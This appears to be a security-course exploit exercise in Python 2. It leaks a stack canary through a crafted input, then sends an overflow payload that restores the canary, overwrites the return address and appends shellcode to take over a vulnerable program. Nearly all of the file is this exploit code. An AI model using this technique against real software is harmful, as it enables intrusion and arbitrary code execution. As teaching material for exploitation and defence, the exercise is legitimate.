#!/usr/bin/env python2

from scaffold import *

# Example send:
p.send('test\\x41\n')

# Example receive:
assert p.recvline() == 'testA'

p.send('A' * 12 + '\\x' + '\n')
canary = p.recvline()[13:17]

# HINT: the last line of your exploit should look something like:
p.send('\x00' * 16  + canary + 'B' * 8 + '\xa4\xf7\xff\xbf' + SHELLCODE + '\x00\n')
# where m, canary, n and rip are all values you must determine
returncode = p.end()

if returncode == -11: print 'segmentation fault or stack canary!'
elif returncode != 0: print 'return code', returncode
